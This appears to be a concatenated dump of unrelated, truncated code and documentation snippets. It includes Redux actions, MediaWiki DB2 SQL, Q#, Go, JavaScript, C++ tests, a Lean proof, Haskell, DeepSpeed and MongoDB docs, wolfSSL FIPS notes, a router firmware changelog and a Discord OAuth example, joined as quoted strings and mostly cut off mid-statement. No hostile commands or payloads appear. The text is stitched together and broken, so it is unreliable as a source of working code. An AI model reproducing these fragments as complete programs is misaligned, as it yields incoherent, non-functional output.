Actions.FETCH_CURRENT_RATE\n}\n\nexport interface FetchCurrentRateSuccessAction {\n type: Actions.FETCH_CURRENT_RATE_SUCCESS\n currencyCode: LocalCurrencyCode\n exchangeRate: string\n now: number\n}\n\nexport interface FetchCurrentRateFailureAction {\n type: Actions.FETCH_CURRENT_RATE_FAILURE\n}\n\nexport interface SelectPreferredCurrencyAction {\n type: Actions.SELECT_PREFERRED_CURRENCY\n currencyCode: LocalCurrencyCode\n}\n\nexport type ActionTypes =\n | FetchCurrentRateAction\n | FetchCurrentRateSuccessAction\n | FetchCurrentRateFailureAction\n | SelectPreferredCurrencyAction\n\nexport const fetchCurrentRate = (): FetchCurrentRateAction => ({\n type: Actions.FETCH_CURRENT_RATE,\n})\n\nexport const fetchCurrentRateSuccess = (\n currencyCode: LocalCurrencyCode,\n exchangeRate: string,\n now: number\n): FetchCurrentRateSuccessAction => ({\n type: Actions.FETCH_CURRENT_RATE_SUCCESS,\n currencyCode,\n exchangeRate,\n now,\n})\n\nexport const fetchCurrentRateFailure = (): FetchCurrentRateFailureAction => ({\n type: Actions.FETCH_CURRENT_RATE_FAILURE,\n})\n\nexport const selectPreferredCurrency = (\n currencyCode: LocalCurrencyCode\n): SelectPreferredCurrencyAction => ({\n type: Actions.SELECT_PREFERRED_CURRENCY,\n currencyCode,\n})" +"-- IBM DB2\n\n-- SQL to create the initial tables for the MediaWiki database.\n-- This is read and executed by the install script; you should\n-- not have to run it by itself unless doing a manual install.\n\n-- Notes: \n-- * DB2 will convert all table and column names to all caps internally.\n-- * DB2 has a 32k limit on SQL filesize, so it may be necessary\n-- to split this into two files soon.\n\n\nCREATE TABLE user (\n -- Needs to start with 0\n user_id BIGINT\n PRIMARY KEY GENERATED BY DEFAULT AS IDENTITY (START WITH 0),\n user_name VARCHAR(255) NOT NULL UNIQUE,\n user_real_name VARCHAR(255),\n user_password VARCHAR(1024),\n user_newpassword VARCHAR(1024),\n user_newpass_time TIMESTAMP(3),\n user_token VARCHAR(255),\n user_email VARCHAR(1024),\n user_email_token VARCHAR(255),\n user_email_token_expires TIMESTAMP(3),\n user_email_authenticated TIMESTAMP(3),\n -- obsolete, replace by user_properties table\n -- user_options CLOB(64K) INLINE LENGTH 4096,\n user_touched TIMESTAMP(3),\n user_registration TIMESTAMP(3),\n user_editcount INTEGER\n);\nCREATE INDEX user_email_token_idx\n ON user (user_email_token);\nCREATE UNIQUE INDEX user_include_idx\n ON user (user_id)\n INCLUDE (user_name, user_real_name, user_password, user_newpassword,\n user_newpass_time, user_token,\n user_email, user_email_token, user_email_token_expires,\n user_email_authenticated,\n user_touched, user_registration, user_editcount);\nCREATE UNIQUE INDEX user_email\n ON user (user_email);\n\n\n\n-- Create a dummy user to satisfy fk contraints especially with revisions\nINSERT INTO user(\n user_name, user_real_name, user_password, user_newpassword, user_newpass_time,\n user_email, user_email_authenticated, user_token, user_registration," +"// Copyright (c) Microsoft Corporation. All rights reserved.\n// Licensed under the MIT License.\n\nnamespace Microsoft.Quantum.Math {\n open Microsoft.Quantum.Intrinsic;\n open Microsoft.Quantum.Canon;\n open Microsoft.Quantum.Convert;\n open Microsoft.Quantum.Random;\n\n @Deprecated(\"Microsoft.Quantum.Random.DrawRandomInt\")\n operation RandomIntPow2 (maxBits : Int) : Int {\n return DrawRandomInt(0, 2^maxBits - 1);\n }\n \n @Deprecated(\"Microsoft.Quantum.Random.DrawRandomInt\")\n operation RandomInt (maxInt : Int) : Int {\n return DrawRandomInt(0, maxInt - 1);\n }\n \n \n @Deprecated(\"Microsoft.Quantum.Random.DrawRandomDouble\")\n operation RandomReal (bitsRandom : Int) : Double {\n if (bitsRandom < 1) {\n fail $\"Number of random bits must be greater than 0.\";\n }\n \n return IntAsDouble(RandomIntPow2(bitsRandom)) / PowD(2.0, IntAsDouble(bitsRandom));\n }\n\n @Deprecated(\"Microsoft.Quantum.Random.DrawRandomPauli\")\n operation RandomSingleQubitPauli() : Pauli {\n return Snd(MaybeChooseElement([PauliI, PauliX, PauliY, PauliZ], DiscreteUniformDistribution(0, 3)));\n }\n\n}" +"# Custom predicates\n\nThe library comes with a lot [predefined predicates][provided-predicates]\nbut also allows to define your own. This example shows how to add predicates\nfor a simple type representing a point in a two-dimensional [Cartesian\ncoordinate system][cartesian-coordinate-system]. We start by defining a\n`Point` class that represents a point in our coordinate system:\n\n```scala\nscala> case class Point(x: Int, y: Int)\ndefined class Point\n```\n\nThe axes of a two-dimensional Cartesian coordinate system divide the plane into\nfour infinite regions, called quadrants, which are often numbered 1st to 4th.\nSuppose we want to refine `Point`s with the quadrant they are lying in.\nSo let's create simple types that represent the four quadrants:\n\n```scala\nscala> case class Quadrant1()\ndefined class Quadrant1\n\nscala> case class Quadrant2()\ndefined class Quadrant2\n\nscala> case class Quadrant3()\ndefined class Quadrant3\n\nscala> case class Quadrant4()\ndefined class Quadrant4\n```\n\nWe now have type-level predicates and a type that we want to refine with these\npredicates. The next step is to define instances of the `Validate` type class\nfor `Point` that are indexed by the corresponding quadrant predicate. We use\nthe `Validate.fromPredicate` function to create the instances from two functions,\none that checks if a given `Point` lies" +"package reads\n\nimport (\n\t\"context\"\n\n\t\"github.com/influxdata/influxdb/v2/models\"\n\t\"github.com/influxdata/influxdb/v2/tsdb/cursors\"\n\t\"github.com/influxdata/influxql\"\n)\n\ntype SeriesCursor interface {\n\tClose()\n\tNext() *SeriesRow\n\tErr() error\n}\n\ntype SeriesRow struct {\n\tSortKey []byte\n\tName []byte // measurement name\n\tSeriesTags models.Tags // unmodified series tags\n\tTags models.Tags\n\tField string\n\tQuery cursors.CursorIterators\n\tValueCond influxql.Expr\n}\n\ntype limitSeriesCursor struct {\n\tSeriesCursor\n\tn, o, c int64\n}\n\nfunc NewLimitSeriesCursor(ctx context.Context, cur SeriesCursor, n, o int64) SeriesCursor {\n\treturn &limitSeriesCursor{SeriesCursor: cur, o: o, n: n}\n}\n\nfunc (c *limitSeriesCursor) Next() *SeriesRow {\n\tif c.o > 0 {\n\t\tfor i := int64(0); i < c.o; i++ {\n\t\t\tif c.SeriesCursor.Next() == nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tc.o = 0\n\t}\n\n\tif c.c >= c.n {\n\t\treturn nil\n\t}\n\tc.c++\n\treturn c.SeriesCursor.Next()\n}" +"'use strict';\n\nvar ParserError = require('./errors').ParserError\n , log = require('diagnostics')('primus:spark')\n , parse = require('querystring').parse\n , forwarded = require('forwarded-for')\n , nanoid = require('nanoid').nanoid\n , Ultron = require('ultron')\n , fuse = require('fusing')\n , u2028 = /\\u2028/g\n , u2029 = /\\u2029/g;\n\n/**\n * The Spark is an indefinable, indescribable energy or soul of a transformer\n * which can be used to create new transformers. In our case, it's a simple\n * wrapping interface.\n *\n * @constructor\n * @param {Primus} primus Reference to the Primus server. (Set using .bind)\n * @param {Object} headers The request headers for this connection.\n * @param {Object} address The object that holds the remoteAddress and port.\n * @param {Object} query The query string of request.\n * @param {String} id An optional id of the socket, or we will generate one.\n * @param {Request} request The HTTP Request instance that initialised the spark.\n * @param {Mixed} socket Reference to the transformer socket.\n * @api public\n */\nfunction Spark(primus, headers, address, query, id, request, socket) {\n this.fuse();\n\n var writable = this.writable\n , spark = this\n , idgen = primus.options.idGenerator;\n\n query = query || {};\n id = idgen ? idgen() : (id || nanoid());\n headers = headers || {};\n address = address" +"Tomato USB Mod (ND version)\n===========================\n\nbuild 01 - 12/17/2008\n---------------------\n\nBased on the official Tomato 1.23 ND.\n\nAdded support for USB 1.1 (OHCI and UHCI) and USB 2.0.\n\nUSB support is configurable via Tomato GUI.\n\nUSB storage (Ext2, Ext3 and FAT file systems) and USB printing support.\n\nNon-spooling printer server (p910nd 0.92) is included and started\nautomatically if you enable printing support. Bidirectional copying can\nbe disabled via GUI if it causes problems with your printer.\n\nFixed slow running clock problem on Asus WL-520GU. After flashing this\nfirmware you have to reboot the router at least once for clock to get\nfixed.\n\nUPnP is disabled by default.\n\nAdded CGI support to HTTP daemon - you can place your cgi scripts into\n\"/www/ext/cgi-bin\" folder, and they will be executed when you access them\nvia http://<router_ip>/ext/cgi-bin/my_script_name.\n\n\nbuild 02 - 12/20/2008\n---------------------\n\nAllowed changing USB settings without rebooting a router.\n\nFixed non-working AIR (WLAN) LED on Asus WL-520GU.\n\nUSB support code clean-up.\n\n\nbuild 03 - 12/22/2008\n---------------------\n\nCosmetic changes only.\n\n\nbuild 04 - 12/26/2008\n---------------------\n\nAdded FTP server daemon (vsftpd 2.0.7) configurable via GUI.\n\nUpdated kernel printer driver to version 0.13 and included some fixes\nto the printer driver made by Asus." +"#pragma once\n\n#include \"NonCopyable.hpp\"\n\n#include <string>\n\nnamespace Fling\n{\n class World;\n\n /**\n * @brief A level contains active objects and provides the environment\n * for the player. You should only load a level through the world. \n */\n class Level : public NonCopyable\n {\n public:\n\t\t/**\n\t\t* Loads this level based on the given file name. \n\t\t* @param t_LevelFile\t\tThe path to the level file (should be a full path, NOT relative to assets dir)\n\t\t*/\n explicit Level(const std::string& t_LevelFile, World* t_OwningWorld);\n ~Level();\n\n /**\n * @brief Update the BSP of actors and tick every active actor. \n * @see World::Update\n * \n * @param t_DeltaTime Time between previous frame and the current one. \n */\n void Update(float t_DeltaTime);\n\n /**\n * @brief Unload the current level and all actors inside of it\n */\n void Unload();\n\n /**\n * @brief Get the Owning World object of this level. \n * \n * @return World* \n */\n World* GetOwningWorld() const { return m_OwningWorld; }\n\n private:\n\n // BSPTree m_Model;\n // std::vector<Actor> m_ActiveActors;\n\n\t\t/** The path to the level file (should be a full path, NOT relative to assets dir) */\n std::string m_LevelFileName = \"UNLOADED\";\n\n /**\n * @brief Load the level based on the current file name! \n */\n void LoadLevel();\n\n /**\n * @brief" +"\ufeffnamespace TraktRater.Sites.API.Flixster\n{\n using System.Runtime.Serialization;\n\n [DataContract]\n public class FlixsterMovieRating\n {\n [DataMember(Name = \"user\")]\n public FlixsterUser User { get; set; }\n\n [DataMember(Name = \"movie\")]\n public FlixsterMovie Movie { get; set; }\n\n [DataMember(Name = \"movieId\")]\n public string MovieId { get; set; }\n\n [DataMember(Name = \"movieUrl\")]\n public string MovieUrl { get; set; }\n\n [DataMember(Name = \"score\")]\n public string UserScore { get; set; }\n\n [DataMember(Name = \"review\")]\n public string Review { get; set; }\n\n [DataMember(Name = \"lastUpdated\")]\n public string LastUpdated { get; set; }\n\n [DataMember(Name = \"ratingSource\")]\n public string RatingSource { get; set; }\n\n [DataMember(Name = \"fbshare\")]\n public bool FacebookShare { get; set; }\n }\n}" +"\n// copyright marazmista @ 12.05.2014\n\n// class for communication with daemon\n\n#ifndef DAEMONCOMM_H\n#define DAEMONCOMM_H\n\n#include <QLocalSocket>\n#include <QDataStream>\n#include <QTimer>\n\n#define SEPARATOR '#'\n#define DAEMON_SIGNAL_CONFIG '0'\n#define DAEMON_SIGNAL_READ_CLOCKS '1'\n#define DAEMON_SIGNAL_SET_VALUE '2'\n#define DAEMON_SIGNAL_TIMER_ON '4'\n#define DAEMON_SIGNAL_TIMER_OFF '5'\n#define DAEMON_SHAREDMEM_KEY '6'\n#define DAEMON_ALIVE '7'\n\nclass DaemonComm : public QObject\n{\n Q_OBJECT\n\npublic:\n\n enum ConfirmationMehtod {\n DISABLED,\n ON_REQUEST,\n PERIODICALLY\n };\n\n DaemonComm();\n ~DaemonComm();\n void connectToDaemon();\n void disconnectDaemon();\n void sendCommand(const QString command);\n void setConnectionConfirmationMethod(const ConfirmationMehtod method);\n\n inline bool isConnected() {\n return (signalSender->state() == QLocalSocket::ConnectedState);\n }\n\n inline const QLocalSocket* getSocketPtr() {\n return signalSender;\n }\n\n\npublic slots:\n void receiveFromDaemon();\n void sendConnectionConfirmation();\n\nprivate:\n QDataStream feedback;\n QLocalSocket *signalSender;\n QTimer *confirmationTimer;\n};\n\n#endif // DAEMONCOMM_H" +"/-\nCopyright (c) 2019 Jean Lo. All rights reserved.\nReleased under Apache 2.0 license as described in the file LICENSE.\nAuthors: Jean Lo\n-/\nimport topology.metric_space.hausdorff_distance\n\n/-!\n# Riesz's lemma\n\nRiesz's lemma, stated for a normed space over a normed field: for any\nclosed proper subspace F of E, there is a nonzero x such that \u2225x - F\u2225\nis at least r * \u2225x\u2225 for any r < 1.\n-/\n\nvariables {\ud835\udd5c : Type*} [normed_field \ud835\udd5c]\nvariables {E : Type*} [normed_group E] [normed_space \ud835\udd5c E]\n\n/-- Riesz's lemma, which usually states that it is possible to find a\nvector with norm 1 whose distance to a closed proper subspace is\narbitrarily close to 1. The statement here is in terms of multiples of\nnorms, since in general the existence of an element of norm exactly 1\nis not guaranteed. -/\nlemma riesz_lemma {F : subspace \ud835\udd5c E} (hFc : is_closed (F : set E))\n (hF : \u2203 x : E, x \u2209 F) {r : \u211d} (hr : r < 1) :\n \u2203 x\u2080 : E, x\u2080 \u2209 F \u2227 \u2200 y \u2208 F, r * \u2225x\u2080\u2225 \u2264 \u2225x\u2080 - y\u2225 :=\nbegin\n classical,\n obtain \u27e8x, hx\u27e9 : \u2203" +"{-# LANGUAGE DeriveGeneric #-}\n{-# LANGUAGE GADTs #-}\n-- | Transform a composition by splitting parents.\nmodule Komposition.Composition.Split where\n\nimport Komposition.Prelude\n\nimport Control.Lens\nimport qualified Data.List.NonEmpty as NonEmpty\n\nimport Komposition.Composition\nimport Komposition.Duration\nimport Komposition.Focus\nimport Komposition.MediaType\n\ndata ParallelSplitMode = OnExactClips Int Int | OnClipsNearFocus\n deriving (Eq, Show, Generic)\n\nsplit ::\n ParallelSplitMode\n -> Focus (ToFocusType Timeline)\n -> Timeline a\n -> Maybe (Timeline a, Focus (ToFocusType Timeline))\nsplit = splitOnTimeline\n\nsplitOnTimeline\n :: ParallelSplitMode\n -> SequenceFocus\n -> Timeline a\n -> Maybe (Timeline a, SequenceFocus)\nsplitOnTimeline _ (SequenceFocus sIdx (Just (ParallelFocus pIdx Nothing))) (Timeline seqs) = do\n let newFocus = SequenceFocus sIdx (Just (ParallelFocus (pred pIdx) Nothing))\n Sequence ann pars <- toList seqs `atMay` sIdx\n let (p1, p2) = NonEmpty.splitAt pIdx pars\n ps1 <- nonEmpty p1\n ps2 <- nonEmpty p2\n Just\n ( Timeline (replaceManyAt sIdx [Sequence ann ps1, Sequence ann ps2] seqs)\n , newFocus)\nsplitOnTimeline splitMode (SequenceFocus idx (Just subFocus)) (Timeline seqs) = do\n (seq', newSubFocus) <- splitOnSequence splitMode subFocus =<< toList seqs `atMay` idx\n pure (Timeline (seqs & ix idx .~ seq'), SequenceFocus idx (Just newSubFocus))\nsplitOnTimeline _ _ _ = mzero\n\nsplitOnSequence\n :: ParallelSplitMode\n -> ParallelFocus\n -> Sequence a\n -> Maybe (Sequence a, ParallelFocus)\nsplitOnSequence splitMode (ParallelFocus pIdx (Just (TrackFocus mediaType' (Just" +"Namespaces are a way to group related code and to avoid name clashes and are generally present in all but the most trivial code base.\n\nThe syntax is as follows:\n\n```csharp\nnamespace MyNameSpace\n{\n public class MyClass {}\n\n public class OtherClass {}\n}\n```\n\nTypes enclosed in namespaces are referred to outside the scope of the namespace by prefixing the type name with the dot syntax. Alternatively, and more usually, you can place a `using` directive at the top of the file (or within a namespace) and type can be used without the prefix. Within the same namespace there is no need to qualify type names.\n\n```csharp\nnamespace MySpace\n{\n public class MyClass {}\n\n public class Foo\n {\n public void Bar()\n {\n var baz = new MyClass();\n }\n }\n}\n\npublic class Qux\n{\n public void Box()\n {\n var nux = new MySpace.MyClass();\n }\n}\n\nnamespace OtherSpace\n{\n using MySpace;\n\n public class Tix\n {\n public void Jeg()\n {\n var lor = new MyClass();\n }\n }\n}\n```\n\nYou can alias a namespace with the syntax `using MyAlias = MySpace;` and then use the alias anywhere that the namespace could be used." +"#include <cassert>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <errno.h>\n\n#include \"testsuite.hpp\"\n\n#define BOGUS_FD 1947830128\n\n// TODO: openat is not implemented\n/*DEFINE_TEST(openat_bad_dirfd, ([] {\n\tint fd = openat(BOGUS_FD, \"foo\", O_RDONLY);\n\tassert(fd == -1);\n\tassert(errno == EBADF);\n}))*/\n\nDEFINE_TEST(close_badfd, ([] {\n\tclose(BOGUS_FD);\n}))\n\nDEFINE_TEST(dup_badfd, ([] {\n\tint fd = dup(BOGUS_FD);\n\tassert(fd == -1);\n\tassert(errno == EBADF);\n}))\n\nDEFINE_TEST(io_badfd, ([] {\n\tchar buf[16];\n\n\tint bytes = read(BOGUS_FD, buf, 16);\n\tassert(bytes == -1);\n\tassert(errno == EBADF);\n\tbytes = write(BOGUS_FD, buf, 16);\n\tassert(bytes == -1);\n\tassert(errno == EBADF);\n}))\n\nDEFINE_TEST(stat_badfd, ([] {\n\tstruct stat st;\n\n\tint ret = fstat(BOGUS_FD, &st);\n\tassert(ret == -1);\n\tassert(errno == EBADF);\n}))" +"---\ntitle: \"1-bit Adam: Up to 5x less communication volume and up to 2x faster training\"\n---\n\nIn this tutorial, we are going to introduce the 1-bit Adam optimizer in DeepSpeed. 1-bit Adam can improve model training speed on communication-constrained clusters, especially for communication-intensive large models by reducing the overall communication volume by up to 5x. Detailed description of the 1-bit Adam algorithm, its implementation in DeepSpeed, and performance evaluation is available from our [blog post](https://www.deepspeed.ai/news/2020/09/08/onebit-adam-blog-post.html).\n\nTo illustrate the benefits and usage of 1-bit Adam optimizer in DeepSpeed, we use the following two training tasks as examples:\n\n1. BingBertSQuAD Fine-tuning\n2. BERT Pre-training\n\nFor more details on these tasks, please refer to the tutorial posts on [BingBertSQuAD Fine-tuning](/tutorials/bert-finetuning/) and [BERT Pre-training](/tutorials/bert-pretraining/).\n\n## 1. Overview\n\n### Pre-requisites for installing DeepSpeed\n\nIf you don't already have a copy of the DeepSpeed repository, please clone in\nnow and checkout the DeepSpeedExamples submodule that contains the BingBertSQuAD and BERT Pre-training examples.\n\n```shell\ngit clone https://github.com/microsoft/DeepSpeed\ncd DeepSpeed\ngit submodule update --init --recursive\ncd DeepSpeedExamples/\n```\n\n### Pre-requisites for 1-bit Adam\n\n1-bit Adam uses advanced communication schemes that are not yet supported by PyTorch distributed and NCCL. We rely on Message Passing Interface (MPI) for" +"(* Title: Pure/Concurrent/thread_attributes.ML\n Author: Makarius\n\nThread attributes for interrupt handling.\n*)\n\nsignature THREAD_ATTRIBUTES =\nsig\n type attributes\n val get_attributes: unit -> attributes\n val set_attributes: attributes -> unit\n val convert_attributes: attributes -> Thread.Thread.threadAttribute list\n val no_interrupts: attributes\n val test_interrupts: attributes\n val public_interrupts: attributes\n val private_interrupts: attributes\n val sync_interrupts: attributes -> attributes\n val safe_interrupts: attributes -> attributes\n val with_attributes: attributes -> (attributes -> 'a) -> 'a\n val uninterruptible: ((('c -> 'd) -> 'c -> 'd) -> 'a -> 'b) -> 'a -> 'b\n val expose_interrupt: unit -> unit (*exception Interrupt*)\nend;\n\nstructure Thread_Attributes: THREAD_ATTRIBUTES =\nstruct\n\nabstype attributes = Attributes of Word.word\nwith\n\n(* thread attributes *)\n\nval thread_attributes = 0w7;\n\nval broadcast = 0w1;\n\nval interrupt_state = 0w6;\nval interrupt_defer = 0w0;\nval interrupt_synch = 0w2;\nval interrupt_asynch = 0w4;\nval interrupt_asynch_once = 0w6;\n\n\n(* access thread flags *)\n\nval thread_flags = 0w1;\n\nfun load_word () : word =\n RunCall.loadWord (RunCall.unsafeCast (Thread.Thread.self ()), thread_flags);\n\nfun get_attributes () = Attributes (Word.andb (load_word (), thread_attributes));\n\nfun set_attributes (Attributes w) =\n let\n val w' = Word.orb (Word.andb (load_word (), Word.notb thread_attributes), w);\n val _ = RunCall.storeWord (RunCall.unsafeCast (Thread.Thread.self ()), thread_flags, w');\n in\n if Word.andb (w', interrupt_asynch) = interrupt_asynch\n then Thread.Thread.testInterrupt () else ()\n end;" +"======\nShards\n======\n\n.. default-domain:: mongodb\n\n.. contents:: On this page\n :local:\n :backlinks: none\n :depth: 1\n :class: singlecol\n\nA :term:`shard` contains a subset of sharded data for a :term:`sharded\ncluster`. Together, the cluster's shards hold the entire data set for the\ncluster.\n\nAs of MongoDB 3.6, shards must be deployed as a :term:`replica set` to\nprovide redundancy and high availability.\n\nUsers, clients, or applications should only directly connect to a shard to\nperform local administrative and maintenance operations.\n\nPerforming queries on a single shard only returns a subset of data. Connect to\nthe :binary:`~bin.mongos` to perform cluster level operations, including read or\nwrite operations.\n\n.. important::\n\n MongoDB does not guarantee that any two contiguous :term:`chunks<chunk>`\n reside on a single shard.\n\n.. _primary-shard:\n\nPrimary Shard\n-------------\n\nEach database in a sharded cluster has a :term:`primary shard` that holds all\nthe un-sharded collections for that database. Each database has its own\nprimary shard. The primary shard has no relation to the :term:`primary` in a\nreplica set.\n\nThe :binary:`~bin.mongos` selects the primary shard when creating a new database\nby picking the shard in the cluster that has the least amount of data.\n:binary:`~bin.mongos` uses the ``totalSize`` field returned by the\n:dbcommand:`listDatabase` command as" +"# Notes on the wolfssl-fips project\n\nFirst, if you did not get the FIPS files with your archive, you must contact\nwolfSSL to obtain them.\n\n\n# Building the wolfssl-fips project\n\nThe wolfCrypt FIPS library for Windows is a part of the wolfSSL library. It\nmust be built as a static library, for the moment.\n\nThe library project is built with Whole Program Optimization disabled. This is\nrequired so that necessary components of the library are not optimized away.\nThere are two functions added to the library that are used as markers in\nmemory for the in-core memory check of the code. WPO consolidates them into a\nsingle function. WPO also optimizes away the automatic FIPS entry function.\n\nEach of the source files inside the FIPS boundary defines their own code and\nconstant section. The code section names start with \".fipsA$\" and the constant\nsection names start with \".fipsB$\". Each subsection has a letter to organize\nthem in a secific order. This specific ordering puts marker functions and\nconstants on either end of the boundary so it can be hashed.\n\n\n# In Core Memory Test\n\nThe In Core Memory test calculates a checksum (HMAC-SHA256) of the wolfCrypt\nFIPS library code and" +"---\ntitle: Show import items\ndescription: Use Show Import Items to expand IntelliSense in Visual Studio for Mac.\nauthor: cobey\nms.author: cobey\nms.date: 03/29/2019\nms.assetid: C7782BF3-016F-4B41-8A81-85FC540A1A8F\nms.custom: video\n---\n# Show import items\n\nVisual Studio for Mac can show all available types, even if they aren't imported to your project, in your IntelliSense completion list. By selecting an item which isn't imported, the correct `using` statement will be added to your source file.\n\n![show import items overview](media/importitems-overview.gif)\n\n## How to enable\n\nTo enable this feature, open **Preferences** via **Visual Studio** > **Preferences** and navigate to **Text Editor** > **IntelliSense**. Check the box **Show import items** to enable additional items in IntelliSense.\n\n![show import items option](media/show-import-items.png)\n\n## Usage\n\nOnce you enable **Show import items**, the process of using the feature to import an item is similar to the normal actions within IntelliSense. As you type code, items that are valid will populate the completion list. This includes items that haven't been imported yet. The items that aren't imported will show their full namespace to the right of the item, allowing you to see which imports you are pulling in to your project.\n\n![show import items list](media/show-import-items-list.png)\n\nIn the IntelliSense list, namespaces" +"; SPDX-License-Identifier: BSD-2-Clause\n; X-SPDX-Copyright-Text: (c) Solarflare Communications Inc\n; Config files support comments such as this line\n\n; Cluster names are case sensitive and are defined as following.\n[Cluster A]\n\n; Property names are case insensitive. But property values are case\n; sensitive.\n\n; CaptureInterface is a required property and be specified just once\nCaptureInterface = eth4\n\n; CaptureStream is a required property can be specified multiple\n; times to capture multiple streams.\nCaptureStream = dhost=239.1.2.3, dport=12345, udp\nCaptureStream = dhost=239.1.2.3, dport=12346, udp\n\n; NumChannels is optional. If not specified, default is 1\nNumChannels = 2\n\n; ProtectionMode is optional. If not specified, default is\n; EF_PD_DEFAULT. Allowed options can be looked up in\n; onload/src/include/etherfabric/pd.h\nProtectionMode = EF_PD_DEFAULT\n\n; We also support multi line properties like below\nCaptureStream = \\\n dhost=239.1.2.3,dport=12347,udp\n\n; CaptureMode is optional. The default is 'steal'. You can also set\n; it to 'sniff'. Currently, only 'all' CaptureStream can be sniffed.\nCaptureMode = steal\n\n; Promiscuous is optional. The default is 1. It does not have any\n; affect if CaptureMode is not specified. If CaptureMode is\n; specified, then this dictates whether promiscuous mode is enabled or\n; not.\nPromiscuous = 1\n\n\n; You" +"//! testing the ignore attribute\n\nuse druid::Data;\n\n#[test]\nfn simple_ignore() {\n #[derive(Clone, Data)]\n struct Point {\n x: f64,\n #[data(ignore)]\n y: f64,\n }\n let p1 = Point { x: 0.0, y: 1.0 };\n let p2 = Point { x: 0.0, y: 9.0 };\n assert!(p1.same(&p2));\n}\n\n#[test]\nfn ignore_item_without_data_impl() {\n use std::path::PathBuf;\n\n #[derive(Clone, Data)]\n struct CoolStruct {\n len: usize,\n #[data(ignore)]\n path: PathBuf,\n }\n}\n\n#[test]\nfn tuple_struct() {\n #[derive(Clone, Data)]\n struct Tup(usize, #[data(ignore)] usize);\n\n let one = Tup(1, 1);\n let two = Tup(1, 5);\n assert!(one.same(&two));\n}\n\n#[test]\nfn enums() {\n #[derive(Clone, Data)]\n enum Hmm {\n Named {\n one: usize,\n #[data(ignore)]\n two: usize,\n },\n Tuple(#[data(ignore)] usize, usize),\n }\n\n let name_one = Hmm::Named { one: 5, two: 4 };\n let name_two = Hmm::Named { one: 5, two: 42 };\n let tuple_one = Hmm::Tuple(2, 4);\n let tuple_two = Hmm::Tuple(9, 4);\n\n assert!(!name_one.same(&tuple_one));\n assert!(name_one.same(&name_two));\n assert!(tuple_one.same(&tuple_two));\n}" +"{\n \"name\" : \"1706.03335.pdf\",\n \"metadata\" : {\n \"source\" : \"CRF\",\n \"title\" : \"Exploring Automated Essay Scoring for Nonnative English Speakers\",\n \"authors\" : [ \"Amber Nigam\" ],\n \"emails\" : [ ],\n \"sections\" : [ {\n \"heading\" : null,\n \"text\" : \"Automated Essay Scoring (AES) has been quite popular and is being widely used. However, lack of appropriate methodology for rating nonnative English speakers\u2019 essays has meant a lopsided advancement in this field. In this paper, we report initial results of our experiments with nonnative AES that learns from manual evaluation of nonnative essays. For this purpose, we conducted an exercise in which essays written by nonnative English speakers in test environment were rated both manually and by the automated system designed for the experiment. In the process, we experimented with a few features to learn about nuances linked to nonnative evaluation. The proposed methodology of automated essay evaluation has yielded a correlation coefficient of 0.750 with the manual evaluation.\"\n }, {\n \"heading\" : \"1. Introduction\",\n \"text\" : \"There are different versions of Automated Essay Scoring (AES) and lack of generalizability across different analyses and corpuses prompts a question over the validity of one size fits all AES.\\nFurthermore, nonnative analysis is differentiated" +"#include \"enumTypeDescriptor.h\"\n\n/*\n * why have EnumTypeDescriptor + EnumerationTypeDescriptor ???\n * this was in ExpDict.cc before splitting it up\n */\n#ifdef NOT_YET\nEnumerationTypeDescriptor::EnumerationTypeDescriptor( ) {\n _elements = new StringAggregate;\n}\n#endif\n\nEnumTypeDescriptor::EnumTypeDescriptor( const char * nm, PrimitiveType ft,\n Schema * origSchema,\n const char * d, EnumCreator f )\n : TypeDescriptor( nm, ft, origSchema, d ), CreateNewEnum( f ) {\n}\n\nSDAI_Enum * EnumTypeDescriptor::CreateEnum() {\n if( CreateNewEnum ) {\n return CreateNewEnum();\n } else {\n return 0;\n }\n}\n\nconst char * EnumTypeDescriptor::GenerateExpress( std::string & buf ) const {\n char tmp[BUFSIZ];\n buf = \"TYPE \";\n buf.append( StrToLower( Name(), tmp ) );\n buf.append( \" = ENUMERATION OF \\n (\" );\n const char * desc = Description();\n const char * ptr = &( desc[16] );\n\n while( *ptr != '\\0' ) {\n if( *ptr == ',' ) {\n buf.append( \",\\n \" );\n } else if( isupper( *ptr ) ) {\n buf += ( char )tolower( *ptr );\n } else {\n buf += *ptr;\n }\n ptr++;\n }\n buf.append( \";\\n\" );\n ///////////////\n // count is # of WHERE rules\n if( _where_rules != 0 ) {\n int all_comments = 1;\n int count = _where_rules->Count();\n for( int i = 0; i < count; i++ ) { // print out" +"# ARGO\n\n[![NPM version](https://badge.fury.io/js/argo-trading.svg)](http://badge.fury.io/js/argo-trading)\n![](https://github.com/albertosantini/argo/workflows/CI/badge.svg)\n\n**Argo** is an open source trading platform, connecting directly with [OANDA][]\nthrough the powerful [API][] to develop trading strategies.\n\n## Installation\n\nAfter installing [Node.js](https://nodejs.org/) (required), you can install **Argo**.\n\n- Release 3.x for legacy accounts: if your account id contains only digits (ie. 2534233), it is a legacy account.\n- Release 4.x (or higher) for v20 accounts.\n\n```\n$ npm install -g argo-trading\n```\n\n## Starting Web App\n\n```\n$ argo-trading\n```\nEventually point your web brower to `http://localhost:8000`.\n\nFinally you need to point to the `host` and `port` defined by `ARGO_PORT` environment variable (`8000` is the default) where you started `argo` \n\n## Starting Standalone App\n\n```\n$ argo-trading-standalone\n```\n\nTested locally with Node.js 10.x, hyperHTML 2.x.\n\n## Basic features\n\n- Account summary updated for each event.\n- Quotes and spreads list updated tick-by-tick.\n- Charts with different time frames updated tick-by-tick.\n- Market and limit orders with stop loss, take profit and trailing stop.\n- Trades list with current and profit updated tick-by-tick.\n- Orders list with distance updated tick-by-tick.\n- Positions summary.\n- Expositions summary.\n- Transactions history.\n- Economic calendar.\n\n## Advanced features\n\n- Executing trading strategies with [plugins](https://github.com/albertosantini/argo-trading-plugin-seed).\n\n## [Documentation](http://argo.js.org/docs/)\n\n##" +"*copy pasted from Qweko Dev Discord - check pins*\n\nClient Authorization Example (For using Client's methods)\n```py\nimport pypresence\nc = pypresence.Client(CLIENT_ID)\nc.start()\nauth = c.authorize(CLIENT_ID, ['rpc']) # If you need other scopes, add them\ncode_grant = auth.code\n# Exchange code grant for token, rtfd\n# Now each time you can use\nc.authenticate(oauth2token)\n```\nYou *will* need a redirect URI set in your application. localhost/randomendpoint should work, but you'll also have to listen for any requests sent to it. It'll return an oauth2 code, which you send to the Token URL (read the docs), in return for a Oauth2 token to use with `Client.authenticate(token)` that means they dont need to auth it every time." +"/* Auto generated file: with makeref.py . Docs go in docs/reST/ref/ . */\n#define 